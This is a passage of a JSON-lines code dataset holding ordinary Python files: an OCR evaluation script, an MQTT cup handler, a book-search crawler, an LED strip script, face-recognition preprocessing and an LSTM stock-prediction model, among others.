filename))\n break\n print('Find {} images'.format(len(files)))\n return files\n\n\ndef resize_image(im, max_side_len=2400):\n \"\"\"\n resize image to a size multiple of 32 which is required by the network\n :param im: the resized image\n :param max_side_len: limit of max image size to avoid out of memory in gpu\n :return: the resized image and the resize ratio\n \"\"\"\n h, w, _ = im.shape\n\n resize_w = w\n resize_h = h\n\n # limit the max side\n if max(resize_h, resize_w) > max_side_len:\n ratio = float(max_side_len) / resize_h if resize_h > resize_w else float(max_side_len) / resize_w\n else:\n ratio = 1.\n resize_h = int(resize_h * ratio)\n resize_w = int(resize_w * ratio)\n\n resize_h = resize_h if resize_h % 32 == 0 else (resize_h // 32 - 1) * 32\n resize_w = resize_w if resize_w % 32 == 0 else (resize_w // 32 - 1) * 32\n resize_h = max(32, resize_h)\n resize_w = max(32, resize_w)\n im = cv2.resize(im, (int(resize_w), int(resize_h)))\n\n ratio_h = resize_h / float(h)\n ratio_w = resize_w / float(w)\n\n return im, (ratio_h, ratio_w)\n\n\ndef detect(score_map, geo_map, timer, score_map_thresh=0.8, box_thresh=0.1, nms_thres=0.2):\n \"\"\"\n restore text boxes from score map and geo map\n :param score_map:\n :param geo_map:\n :param timer:\n :param score_map_thresh: threshhold for score map\n :param box_thresh: threshhold for boxes\n :param nms_thres: threshold for nms\n :return:\n \"\"\"\n if len(score_map.shape) == 4:\n score_map = score_map[0, :, :, 0]\n geo_map = geo_map[0, :, :, ]\n # filter the score map\n xy_text = np.argwhere(score_map > score_map_thresh)\n # sort the text boxes via the y axis\n xy_text = xy_text[np.argsort(xy_text[:, 0])]\n # restore\n start = time.time()\n text_box_restored = restore_rectangle(xy_text[:, ::-1] * 4, geo_map[xy_text[:, 0], xy_text[:, 1], :]) # N*4*2\n print('{} text boxes before nms'.format(text_box_restored.shape[0]))\n boxes = np.zeros((text_box_restored.shape[0], 9), dtype=np.float32)\n boxes[:, :8] = text_box_restored.reshape((-1, 8))\n boxes[:, 8] = score_map[xy_text[:, 0], xy_text[:, 1]]\n timer['restore'] = time.time() - start\n # nms part\n start = time.time()\n boxes = locality_aware_nms.nms_locality(boxes.astype(np.float64), nms_thres)\n timer['nms'] = time.time() - start\n\n if boxes.shape[0] == 0:\n return None, timer\n\n # here we filter some low score boxes by the average score map, this is different from the orginal paper\n for i, box in enumerate(boxes):\n mask = np.zeros_like(score_map, dtype=np.uint8)\n cv2.fillPoly(mask, box[:8].reshape((-1, 4, 2)).astype(np.int32) // 4, 1)\n boxes[i, 8] = cv2.mean(score_map, mask)[0]\n boxes = boxes[boxes[:, 8] > box_thresh]\n\n return boxes, timer\n\n\ndef sort_poly(p):\n min_axis = np.argmin(np.sum(p, axis=1))\n p = p[[min_axis, (min_axis + 1) % 4, (min_axis + 2) % 4, (min_axis + 3) % 4]]\n if abs(p[0, 0] - p[1, 0]) > abs(p[0, 1] - p[1, 1]):\n return p\n else:\n return p[[0, 3, 2, 1]]\n\n\ndef recognize(model, detection, img_data, input_img, debug=False):\n boxo = detection\n boxr = boxo[0:8].reshape(-1, 2)\n\n boxhelp = np.copy(boxr)\n boxr[0, :] = boxhelp[3, :]\n boxr[1, :] = boxhelp[0, :]\n boxr[2, :] = boxhelp[1, :]\n boxr[3, :] = boxhelp[2, :]\n\n center = (boxr[0, :] + boxr[1, :] + boxr[2, :] + boxr[3, :]) / 4\n dw = boxr[2, :] - boxr[1, :]\n dh = boxr[1, :] - boxr[0, :]\n\n w = math.sqrt(dw[0] * dw[0] + dw[1] * dw[1])\n h = math.sqrt(dh[0] * dh[0] + dh[1] * dh[1]) + random.randint(-2, 2)\n\n angle = math.atan2((boxr[2][1] - boxr[1][1]), boxr[2][0] - boxr[1][0])\n angle2 = math.atan2((boxr[3][1] - boxr[0][1]), boxr[3][0] - boxr[0][0])\n angle = (angle + angle2) / 2\n\n input_W = img_data.size(3)\n input_H = img_data.size(2)\n target_h = 44\n\n scale = target_h / h\n target_gw = int(w * scale + target_h / 4)\n target_gw = max(8, int(round(target_gw / 4)) * 4)\n xc = center[0]\n yc = center[1]\n w2 = w\n h2 = h\n\n # show pooled image in image layer\n scalex = (w2 + h2 / 4) / input_W\n scaley = h2 / input_H\n\n th11 = scalex * math.cos(angle)\n th12 = -math.sin(angle) * scaley\n th13 = (2 * xc - input_W - 1) / (input_W - 1)\n\n th21 = math.sin(angle) * scalex\n th22 = scaley * math.cos(angle)\n th23 = (2 * yc - input_H - 1) / (input_H - 1)\n\n t = np.asarray([th11, th12, th13, th21, th22, th23], dtype=np.float)\n t = torch.from_numpy(t).type(torch.FloatTensor)\n t = t.cuda()\n theta = t.view(-1, 2, 3)\n\n grid = F.affine_grid(theta, torch.Size((1, 3, int(target_h), int(target_gw))))\n x = F.grid_sample(img_data, grid)\n\n labels_pred = model.forward_ocr(x)\n\n if debug:\n x_d = x.data.cpu().numpy()[0]\n x_data_draw = x_d.swapaxes(0, 2)\n x_data_draw = x_data_draw.swapaxes(0, 1)\n\n x_data_draw = np.asarray(x_data_draw, dtype=np.uint8)\n x_data_draw = x_data_draw[:, :, ::-1]\n cv2.imshow('ocr_image', x_data_draw)\n\n cv2.imshow('img', input_img)\n\n cv2.waitKey(100)\n\n ctc_f = labels_pred.data.cpu().numpy()\n ctc_f = ctc_f.swapaxes(1, 2)\n labels = ctc_f.argmax(2)\n\n ind = np.unravel_index(labels, ctc_f.shape)\n conf = np.mean(np.exp(ctc_f[ind]))\n\n det_text, conf2, dec_s, splits = print_seq_text(labels[0, :], codec)\n\n return det_text, conf2, dec_s\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--test_data_path', nargs='?', type=str, default='../data/plot/train',\n help='Path to test directory')\n parser.add_argument('--resume', nargs='?', type=str, default=\"checkpoints/LS1706203-400000.h5\",\n help='Path to previous saved model')\n parser.add_argument('--output_dir', nargs='?', type=str, default='outputs/test/', help='Path to output directory')\n parser.add_argument('--debug', nargs='?', type=bool, default=False, help='Debug')\n parser.add_argument('--save_img', nargs='?', type=bool, default=False, help='Save preview images')\n\n args = parser.parse_args()\n\n draw_font = ImageFont.truetype(\"files/arial-unicode-regular.ttf\", 18)\n\n if args.save_img:\n save_img_path = args.output_dir + 'images/'\n if not os.path.exists(save_img_path):\n os.makedirs(save_img_path)\n else:\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n im_fn_list = get_images(args.test_data_path)\n\n model = resnet50(pretrained=True)\n\n for param in model.parameters():\n param.requires_grad = False\n\n model = model.cuda()\n\n if args.resume is not None:\n if os.path.isfile(args.resume):\n print((\"Loading model and optimizer from checkpoint '{}'\".format(args.resume)))\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n print(\"Loaded checkpoint '{}' (step {})\".format(args.resume, checkpoint['step']))\n sys.stdout.flush()\n else:\n print((\"No checkpoint found at '{}'\".format(args.resume)))\n sys.stdout.flush()\n\n model.eval()\n\n with torch.no_grad():\n for im_fn in im_fn_list:\n im = cv2.imread(im_fn)[:, :, ::-1]\n start_time = time.time()\n im_resized, (ratio_h, ratio_w) = resize_image(im, max_side_len=1280)\n images = np.asarray([im_resized], dtype=np.float)\n im_data = np_to_variable(images).permute(0, 3, 1, 2)\n\n timer = {'net': 0, 'restore': 0, 'nms': 0}\n start = time.time()\n score, geometry = model(im_data)\n timer['net'] = time.time() - start\n\n score = score.data.cpu()[0].numpy()\n score = score.squeeze(0)\n\n geometry = geometry.data.cpu()[0].numpy()\n geometry = geometry.swapaxes(0, 1)\n geometry = geometry.swapaxes(1, 2)\n\n boxes, timer = detect(score_map=score, geo_map=geometry, timer=timer)\n print('{} : net {:.0f}ms, restore {:.0f}ms, nms {:.0f}ms'.format(\n im_fn, timer['net'] * 1000, timer['restore'] * 1000, timer['nms'] * 1000))\n\n boxes_out = np.copy(boxes)\n\n if boxes is not None:\n scores = boxes[:, 8].reshape(-1)\n boxes = boxes[:, :8].reshape((-1, 4, 2))\n boxes[:, :, 0] /= ratio_w\n boxes[:, :, 1] /= ratio_h\n\n duration = time.time() - start_time\n print('[timing] {}'.format(duration))\n\n # save to file\n if boxes is not None:\n # print(os.path.basename(im_fn).split('.')[0].replace('ts', 'res'))\n res_file = os.path.join(args.output_dir,\n '{}.txt'.format(os.path.basename(im_fn).split('.')[0].replace('ts', 'res')))\n\n im_draw = np.copy(im)\n img_pil = Image.fromarray(im_draw)\n draw_img = ImageDraw.Draw(img_pil)\n\n with open(res_file, 'w') as f:\n for bid, box in enumerate(boxes):\n # to avoid submitting errors\n box = sort_poly(box.astype(np.int32))\n if np.linalg.norm(box[0] - box[1]) < 5 or np.linalg.norm(box[3] - box[0]) < 5:\n continue\n\n det_text, conf, dec_s = recognize(model, boxes_out[bid], im_data, im[:, :, ::-1], args.debug)\n print(det_text)\n\n draw_text = det_text\n try:\n if len(det_text) > 0 and 'ARABIC' in ud.name(det_text[0]):\n draw_text = det_text[::-1]\n except:\n pass\n\n f.write('{0},{1},{2},{3},{4},{5},{6},{7},{8:.2f},{9}\\r\\n'.format(\n box[0, 0], box[0, 1], box[1, 0], box[1, 1], box[2, 0], box[2, 1], box[3, 0], box[3, 1],\n scores[bid], draw_text\n ))\n\n width, height = draw_img.textsize(det_text, font=draw_font)\n center = [box[0, 0] + 3, box[0, 1] - height - 2]\n\n draw_img.text((center[0], center[1]), det_text, fill=(255, 0, 0), font=draw_font)\n draw_img.polygon(\n [box[0, 0], box[0, 1], box[1, 0], box[1, 1], box[2, 0], box[2, 1], box[3, 0], box[3, 1]],\n outline=(0, 255, 0))\n\n im = np.asarray(img_pil)\n\n if args.save_img:\n img_path = os.path.join(args.output_dir + 'images/', os.path.basename(im_fn))\n cv2.imwrite(img_path, im[:, :, ::-1])\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222695035","text":"model_file = open(\"interaction_model.txt\", \"r\")\nmodel_lines = model_file.readlines()\nmodel_file.close()\n\ntime_file = open(\"time_conditions.txt\", \"r\")\ntime_lines = time_file.readlines()\ntime_file.close()\n\nnew_lines = []\n\nthe_bitch = '{tempo}'\ni = 0\nfor model_line in model_lines:\n\tif the_bitch not in model_line:\n\t\ti += 1\n\t\tnew_lines.append(model_line)\n\telse:\n\t\tprint(\"heyy bitch\")\n\t\tfor time_line in time_lines:\n\t\t\tnew_lines.append(model_line[:model_line.index(the_bitch)] +\n\t\t\t time_line.rstrip() + model_line[model_line.index(the_bitch)+len(the_bitch):])\n\n\nnew_file = open(\"new_interaction_model.txt\", \"w\")\nnew_lines = \"\".join(new_lines)\nnew_file.write(new_lines)\nnew_file.close()","sub_path":"model/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113944473","text":"import json\nfrom cup import Cup\nimport time\nfrom lib.mqtt import MQTTClient\n\nclass MQTT:\n cup = None\n client = None\n\n def init_MQTT(self):\n self.client = MQTTClient(\"CleverCup\", \"broker.hivemq.com\", port=1883)\n self.client.set_callback(self.on_message)\n self.client.connect()\n self.subscribe(self.client)\n self.cup = Cup(self.publish_message)\n print(\"Initializing MQTT\\n\")\n\n while True:\n self.client.check_msg()\n\n def publish_message(self, topic, msg):\n self.client.publish(topic, msg)\n \n def on_message(self, topic, msg):\n print(\"Message: \" + str(msg.decode()))\n self.topicMap[topic.decode()](self, msg)\n\n def on_message_location(self, msg):\n self.client.publish(\"cleverCup/location/response\", str(self.cup.get_location()))\n\n def on_message_threshold(self, msg):\n thresholds = json.loads(str(msg.decode()))\n self.cup.set_thresholds(thresholds['lower'], thresholds['upper'])\n\n topicMap = {\n \"cleverCup/location\": on_message_location,\n \"cleverCup/threshold\": on_message_threshold\n }\n\n def subscribe(self, client):\n for key in self.topicMap.keys(): \n client.subscribe(topic=key)","sub_path":"MQTT/mqtt_handler.py","file_name":"mqtt_handler.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578813619","text":"from crawl.crawl_tools import CrawlTools\nimport json\n\n\nclass Search:\n\n def __init__(self,keyword):\n self.url = 'https://book.douban.com/j/subject_suggest?q=' + str(keyword)\n self.crawl = CrawlTools(self.url)\n self.items = []\n\n def make(self):\n books = json.loads(self.crawl.get())\n items = []\n for book in books:\n\n if book['type'] == 'a':\n continue\n\n items.append({\n 'book': book['title'],\n 'subject': book['id'],\n 'pic': book['pic'],\n 'link': book['url'],\n 'author': book['author_name']\n })\n self.items = items\n return self.items\n\n\n\n# t = Search('php')\n# print(t.make())","sub_path":"crawl/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"488613200","text":"#!/usr/bin/env python3\n# NeoPixel library strandtest example\n# Author: Tony DiCola (tony@tonydicola.com)\n#\n# Direct port of the Arduino NeoPixel library strandtest example. Showcases\n# various animations on a strip of NeoPixels.\n\nimport time\nfrom rpi_ws281x import PixelStrip, Color\nimport argparse\n\n# LED strip configuration:\nLED_COUNT = 74 # Number of LED pixels.\n# LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\nLED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\n# True to invert the signal (when using NPN transistor level shift)\nLED_INVERT = False\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n\ndef getPivot(strip):\n pivot = strip.numPixels() / 2\n if (pivot % 2) == 0:\n return pivot\n else:\n return pivot + 1\n\n# Define functions which animate LEDs in various ways.\ndef biColorWipe(strip, color, pivot, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n if i < pivot:\n strip.setPixelColor(i, color)\n else:\n strip.setPixelColor(i, Color(255,255,255))\n strip.show()\n time.sleep(wait_ms / 1000.0)\n\n\ndef colorWipe(strip, color, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(strip.numPixels()):\n strip.setPixelColor(i, color)\n strip.show()\n time.sleep(wait_ms / 1000.0)\n\n\n# def theaterChase(strip, color, wait_ms=50, iterations=10):\n# \"\"\"Movie theater light style chaser animation.\"\"\"\n# for j in range(iterations):\n# for q in range(3):\n# for i in range(0, strip.numPixels(), 3):\n# strip.setPixelColor(i + q, color)\n# strip.show()\n# time.sleep(wait_ms / 1000.0)\n# for i in range(0, strip.numPixels(), 3):\n# strip.setPixelColor(i + q, 0)\n\n\n# def wheel(pos):\n# \"\"\"Generate rainbow colors across 0-255 positions.\"\"\"\n# if pos < 85:\n# return Color(pos * 3, 255 - pos * 3, 0)\n# elif pos < 170:\n# pos -= 85\n# return Color(255 - pos * 3, 0, pos * 3)\n# else:\n# pos -= 170\n# return Color(0, pos * 3, 255 - pos * 3)\n\n\n# Main program logic follows:\nif __name__ == '__main__':\n # Process arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--clear', action='store_true',\n help='clear the display on exit')\n parser.add_argument('-r', '--red', type=int, default=0,\n help='Value fqor red color')\n parser.add_argument('-g', '--green', type=int, default=0,\n help='Value for green color')\n parser.add_argument('-b', '--blue', type=int, default=0,\n help='Value for blue color')\n parser.add_argument('-w', '--wait', type=int, default=50,\n help='Value for wait')\n\n args = parser.parse_args()\n\n # Create NeoPixel object with appropriate configuration.\n strip = PixelStrip(LED_COUNT, LED_PIN, LED_FREQ_HZ,\n LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\n # Intialize the library (must be called once before other functions).\n strip.begin()\n\n print('Press Ctrl-C to quit.')\n if not args.clear:\n print('Use \"-c\" argument to clear LEDs on exit')\n\n try:\n\n while True:\n pivot = getPivot(strip)\n print(\"Color wipe animations. pivot {}\".format(pivot))\n biColorWipe(strip, Color(args.red, args.green,\n args.blue), pivot, args.wait)\n\n except KeyboardInterrupt:\n if args.clear:\n colorWipe(strip, Color(0, 0, 0), 10)\n","sub_path":"snippets/ws2812b/strip.py","file_name":"strip.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462417738","text":"import logging\n\nfrom six.moves import input\nfrom django.core.management import BaseCommand, CommandError, call_command\nfrom elasticsearch_dsl import connections\nfrom stretch import stretch_app\n\n\nclass Command(BaseCommand):\n \"\"\"\n Remove Elasticsearch Indices\n \"\"\"\n\n can_import_settings = True\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--indices',\n action='append',\n default=list(),\n help='One or more indices to operate on, by index name'\n )\n\n parser.add_argument(\n '--noinput',\n action='store_true',\n help='Run without user interaction.'\n )\n\n def handle(self, *args, **options):\n call_command('stretch', 'remove', indices=options.get('indices'),\n noinput=options.get('noinput'))\n","sub_path":"stretch/management/commands/stretch_remove.py","file_name":"stretch_remove.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87266734","text":"import sys\nsys.stdin = open(\"palindrome_input.txt\", \"r\")\n\ntest_case = int(input())\n\ndef palindrome(a):\n for i in range(len(a)):\n if a[i] == a[-i-1]:\n continue\n else:\n return False\n return True\n\ndef zzzz(a, b):\n if a != None:\n return a\n elif b != None:\n return b\n\nfor case in range(1, test_case+1):\n a, b = map(int, input().split())\n lists = [list(input()) for _ in range(a)]\n array = [int(i) for i in range(a)]\n result = result1 = result2 = None\n sldk = []\n for i in range(len(lists)):\n for j in range(len(lists[i])-b+1):\n sldk = lists[i][j:j+b]\n if palindrome(sldk) == True and len(sldk) == b:\n result1 = ''.join(sldk)\n else:\n sldk = []\n\n asdf = []\n for j in array:\n for i in range(b):\n for k in array[i:i+b+1]:\n asdf.append(lists[k][j])\n if palindrome(asdf) == True and len(asdf) == b:\n result2 = ''.join(asdf)\n else:\n asdf = []\n\n result = zzzz(result1, result2)\n\n print(f'#{case} {result}')\n\n\n","sub_path":"SSAFY/algorithms/SWEA/#3_strings/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442664453","text":"import pandas as pd\nimport numpy as np\n\nimport cv2\nimport uuid\nimport os\nimport face_recognition\n\nprefix = '/opt/ml/'\ninput_path = prefix + 'input/data'\noutput_path = os.path.join(prefix, 'output/')\nmodel_path = os.path.join(prefix, 'model')\ntraining_channel = 'training'\nmodels_channel = 'model'\n\ntraining_path = os.path.join(input_path, training_channel)\nmodels_path = os.path.join(input_path, models_channel)\n\n\"\"\"\n\tThe module implements a few preprocessing functions required/desired in the face recognition app.\n \tIt allows:\n\t1. Extracting a numerical representation of a detected face in an image.\n\t2. Detecting faces in an image.\n\t3. Enhancing images for face recognition purposes.\n\t4. Approximating an image quality in terms of face recognition demands. \n\n\"\"\"\n\ndef find_128D_rep(detected_faces, image, single = False):\n\n\t\"\"\"Find a numerical representation of a face in given image(s).\n\n\t Args:\n\t detected_faces: rectangles, which describe detected faces\n\t image: an image in which the faces were detected\n\t single: a boolean, which define if there's one face in the image or more\n\t Returns:\t \n\t A pandas dataframe with embeddings and labels.\n\t\"\"\"\n\n\tif single == True:\n\n\t\trep = []\n\n\t\ttry:\n\n\t\t\trep = face_recognition.face_encodings(image)[0]\n\n\t\texcept Exception as e:\n\n\t\t\tprint('There are no faces in the provided image. ')\n\n\t\treturn rep\n\n\treturn pd.DataFrame(face_recognition.face_encodings(image)).dropna()\n\ndef enhance_image(image):\n\n\t\"\"\"Enhance an image, i.e. equalize the Y channel (YCrCb).\n\n\t Args:\n\t image: an image to be enhanced\n\t Returns:\t \n\t An enhanced image.\n\t\"\"\"\n\n\timage_YCrCb = cv2.cvtColor(image, cv2.COLOR_RGB2YCR_CB)\n\tY, Cr, Cb = cv2.split(image_YCrCb)\n\tY = cv2.equalizeHist(Y)\n\timage_YCrCb = cv2.merge([Y, Cr, Cb])\n\timage = cv2.cvtColor(image_YCrCb, cv2.COLOR_YCR_CB2RGB)\n\n\treturn image\n\ndef adjust_gamma(image, gamma=1.0):\n\n\t\"\"\"Adjust gamme in an image.\n\n\t Args:\n\t image: an image to be enhanced.\n\t gamma: a rate by which the gamma shall be changed in the image. \n\t Returns:\t \n\t An enhanced image.\n\n\t\"\"\"\n\n\tinvGamma = 1.0 / gamma\n\ttable = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n\treturn cv2.LUT(image, table)\n\ndef find_faces(image):\n\n\t\"\"\"Find faces in an image.\n\n\t Args:\n\t image: an image in which we're looking for faces.\n\t Returns:\t \n\t An enhanced image.\n\n\t\"\"\"\n\n\t#corrected = adjust_gamma(image, 2.0)\n\t#enhanced = enhance_image(image)\n\n\tfaces = face_recognition.face_locations(image) \n\n\treturn faces\n\ndef get_face_coord_CV(face_dlib):\n\n\t#face_dlib = [top, right, bottom, left]\n\n\t\"\"\"Transform face coorodinates from dlib standard to openCV standard.\n\n\t Args:\n\t face_dlib: a list of face coordinates in dlib standard.\n\t Returns:\t \n\t A tuple with openCV face coordinates and yName, which is a coordinate required\n\t for placing a text box with label.\n\n\t\"\"\"\n\n\t# Get openCV rectangle coordinates\n\tx = face_dlib[3]\n\ty = face_dlib[0]\n\tw = face_dlib[1]- face_dlib[3]\n\th = face_dlib[2]- face_dlib[0]\n\tyName = int(y) - 10\n\n\treturn (x, y, w, h, yName)\n\ndef preprocessing_routine(image, single = False):\n\n\t\"\"\"The whole preprocessing routine, which is:\n\t\t1. Find faces in an image.\n\t\t2. Using the detected faces, find their numerical representations.\n\n\t Args:\n\t image: an image in which the faces have to be recognized.\n\t Returns:\t \n\t rep: numerical representation of faces\n\t faces: rectangles describing the detected faces\n\n\t\"\"\"\n\n\tfaces = find_faces(image)\n\trep = find_128D_rep(faces, image, single)\n\n\treturn rep, faces\n\ndef calculate_quality(image, bb):\n\n\t\"\"\"Calculate quality of detected faces. The quality is defined by:\n\t\t\t1. An angle of a face - nose angle.\n\t\t\t2. A blur.\n\t\t\t3. A distance between the eyes.\n\t\t\t4. Brightness of an image.\n\n\t\tThe first three points can be calculated with help of facial landmarks.\n\n\t Args:\n\t image: an image which quality has to be calculated.\n\t bb: a rectangle, which describes a face in the image.\n\t Returns:\t \n\t A scalar value, which defines an overall quality (sum of all of the values)\n\n\t\"\"\"\n\n\tpose_estimation = calc_angle(image, bb)\n\tblur_estimation = calc_blur(image)\n\teyes_estimation = calc_eyes_dist(image, bb)\n\tbrighgtess_estimation = calc_brightness(image)\n\n\treturn pose_estimation + blur_estimation + eyes_estimation + brighgtess_estimation\n\ndef calc_angle(image, bb):\n\n\tlandmarks = face_aligner.findLandmarks(image, bb)\n\n\teyes_center = landmarks[27]\n\tnose_center = landmarks[30]\n\n\ty_dist = abs(nose_center[1] - eyes_center[1])\n\tx_dist = abs(nose_center[0] - eyes_center[0])\n\n\ttry:\n\n\t\tyaw = np.arctan(y_dist / x_dist) # a = tanx <=> x = arctan a\n\n\texcept Exception as e: # division by 0 \n\n\t\treturn 1\n\n\tdegrees = abs((yaw * 180) / np.pi - 90) # convert radians to degrees\n\n\tdegree_score = 1 \n\n\tif degrees > 20 and degrees <= 40:\n\n\t\tdegree_score = 0.5\n\n\telse:\n\n\t\tdegree_score = 0.33\n\n\treturn degree_score\n\ndef calc_blur(image):\n\n\t# see Laplacian transform for reference:\n\t# https://www.pyimagesearch.com/2015/09/07/blur-detection-with-opencv/\n\n\tgray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n\treturn cv2.Laplacian(image, cv2.CV_64F).var() / 3000 \n\ndef calc_eyes_dist(image, bb):\n\n\tlandmarks = face_aligner.findLandmarks(image, bb)\n\n\tleft_eye = np.array(landmarks[36])\n\tright_eye = np.array(landmarks[45])\n\n\treturn np.linalg.norm(left_eye - right_eye) / 96\n\ndef calc_brightness(image):\n\n\tR, G, B = cv2.split(image)\n\treturn (np.mean(R) + np.mean(G) + np.mean(B)) / 300\n\n\n","sub_path":"opt/program/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"403292890","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pandas_datareader as web\nimport datetime as dt\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM\n\n\nclass Model:\n def __init__(self):\n stk_data = pd.read_csv('stk_data.csv')\n self.data, self.test_data = train_test_split(stk_data, test_size=.2, shuffle=False)\n self.scaler = MinMaxScaler(feature_range=(0,1))\n self.scaled_data = self.scaler.fit_transform(self.data['Close'].values.reshape(-1,1))\n prediction_days = 60\n self.x_train = []\n self.y_train = []\n for x in range(prediction_days, len(self.scaled_data)):\n self.x_train.append(self.scaled_data[x-prediction_days:x, 0])\n self.y_train.append(self.scaled_data[x, 0])\n self.x_train, self.y_train = np.array(self.x_train), np.array(self.y_train)\n self.x_train = np.reshape(self.x_train, (self.x_train.shape[0], self.x_train.shape[1], 1))\n #test data preparation\n self.actual_prices = self.test_data['Close'].values\n self.total_dataset = pd.concat((self.data['Close'], self.test_data['Close']), axis=0)\n self.model_inputs = self.total_dataset[len(self.total_dataset) - len(self.test_data) - prediction_days:].values\n self.model_inputs = self.model_inputs.reshape(-1,1)\n self.model_inputs = self.scaler.transform(self.model_inputs)\n self.x_test = []\n for x in range(prediction_days, len(self.model_inputs)):\n self.x_test.append(self.model_inputs[x-prediction_days:x, 0])\n self.x_test = np.array(self.x_test)\n self.x_test = np.reshape(self.x_test, (self.x_test.shape[0], self.x_test.shape[1], 1))\n return\n\n def create(self):\n self.model = Sequential()\n self.model.add(LSTM(units=50, return_sequences=True, input_shape=(self.x_train.shape[1], 1)))\n self.model.add(Dropout(0.2))\n self.model.add(LSTM(units=50, return_sequences=True))\n self.model.add(Dropout(0.2))\n self.model.add(LSTM(units=50))\n self.model.add(Dropout(0.2))\n self.model.add(Dense(units=1))\n self.model.compile(optimizer='adam', loss='mean_squared_error')\n self.model.fit(self.x_train, self.y_train, epochs=25, batch_size=32)\n return self.model\n \n def predict(self, model):\n self.model = model\n self.predicted_prices = self.model.predict(self.x_test)\n self.predicted_prices = self.scaler.inverse_transform(self.predicted_prices)\n\n def plotting(self):\n data = pd.DataFrame()\n data['Date'] = self.test_data['Date']\n data['actual'] = self.actual_prices\n data['prediction'] = self.predicted_prices\n trace1 = go.Scatter(x=data.Date, y=data.actual, text='actual prices')\n trace2 = go.Scatter(x=data.Date, y=data.prediction, text='predicted prices')\n figure = [trace1, trace2]\n fig = {'data':figure}\n return fig\n\n def results(self):\n prediction_days = 60\n self.real_data = [self.model_inputs[len(self.model_inputs)+1-prediction_days:len(self.model_inputs+1), 0]]\n self.real_data = np.array(self.real_data)\n self.real_data = np.reshape(\n self.real_data, (self.real_data.shape[0], self.real_data.shape[1], 1))\n prediction = self.model.predict(self.real_data)\n prediction = self.scaler.inverse_transform(prediction)\n r2 = round(r2_score(self.actual_prices, self.predicted_prices)*100)\n return {'r2': r2,'prediction': prediction[0][0]}\n\n\nif __name__ == \"__main__\":\n import pandas_datareader as web\n import datetime as dt\n \n def save(tik,year=2012):\n start = dt.datetime(year,1,1)\n end = dt.datetime.now()\n data = web.DataReader(tik, 'yahoo', start, end)\n data.to_csv('stk_data.csv', index=True)\n nn = Model()\n seq = nn.create()\n seq.save(f'models/{tik}_nn')\n tiks = [\n 'TTC',\n 'CCIV',\n 'PLUG',\n 'Z74.SI',\n 'FCEL',]\n\n for i in tiks:\n save(i)","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433910421","text":"import getopt\n\nfrom timecheckviz.analyzer import analyze\n\n\nclass AnalyzeCommand:\n __command_name__ = 'analyze'\n\n def execute(self, argv):\n optlist, args = getopt.getopt(argv, 'f:', ['help'])\n optmap = {\n opt[0].lstrip('-'): opt[1]\n for opt in optlist\n }\n\n if 'help' in optmap:\n print(\n \"usage: timecheckviz analyze -f <.tc file>\",\n \"\\n options:\",\n \"\\n -f .tc file\",\n \"\\n --help prints help\"\n )\n return\n\n if 'f' not in optmap:\n print(\"For help, run: timecheckviz analyze --help\")\n return\n\n analyze(optmap['f'])\n","sub_path":"timecheckviz/commands/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156834271","text":"import os\nimport re\n\n\nclass External(object):\n filename = None\n hashes = None\n statements = None\n\n def __init__(self, manifest):\n self._manifest = manifest\n self.hashes = {}\n self.statements = []\n\n def get_filename(self):\n raise NotImplementedError\n\n def get_manifest_title(self):\n raise NotImplementedError\n\n def to_lines(self):\n indentation = ' ' * 4\n lines = ['{}:'.format(self.get_manifest_title())]\n for statement in self.statements:\n lines.append(indentation + statement)\n for hashtype, hexdigest in self.hashes.items():\n lines.append(indentation + 'Hash {type} 